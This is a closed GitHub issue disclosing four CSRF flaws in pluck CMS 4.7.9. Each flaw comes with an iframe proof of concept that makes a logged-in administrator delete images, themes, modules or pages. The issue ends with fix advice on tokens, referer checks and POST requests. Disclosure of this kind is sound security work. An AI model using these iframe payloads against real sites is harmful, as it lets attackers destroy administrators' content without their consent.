Skip to content

Four CSRF vulnerabilities in pluck cms 4.7.9 #69

Closed
@China-Eugene

Description

@China-Eugene

One: use CSRF vulnerability to delete pictures
Vulnerability details:
When the administrator logs in, opening the webpage will automatically delete the specified image.
Vulnerability url: http://127.0.0.1/pluck/admin.php?action=images
Vulnerability POC:

<iframe src="http://127.0.0.1/pluck/admin.php?action=deleteimage&var1=test.jpg" >

Two: use the CSRF vulnerability to delete the topic
Vulnerability details:
When the administrator logs in, opening the web page will automatically delete the specified topic.
Vulnerability url: http://127.0.0.1/pluck/admin.php?action=theme
Vulnerability POC:

<iframe src="http://127.0.0.1/pluck/admin.php?action=theme_delete&var1=oldstyl">

Three: use CSRF vulnerability to remove the module
Vulnerability details:
When the administrator logs in, open the webpage and the specified module will be deleted automatically.
Vulnerability url: http://127.0.0.1/pluck/admin.php?action=modules
Vulnerability POC:

<iframe src="http://127.0.0.1/pluck/admin.php?action=module_delete&var1=albums " >

Four: use CSRF vulnerability to delete pictures
Vulnerability details:
When the administrator logs in, opening the web page will automatically delete the specified article.
Vulnerability url: http://127.0.0.1/pluck/admin.php?action=page
Vulnerability POC:

<iframe src="http://127.0.0.1/pluck/admin.php?action=deletepage&var1=aaaa">

Vulnerability suggestions:
One: Detect user submissions by referer, token, or verification code.
Second: It is best to use the post operation for users to modify and delete.

Metadata

Metadata

Assignees

No one assigned

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions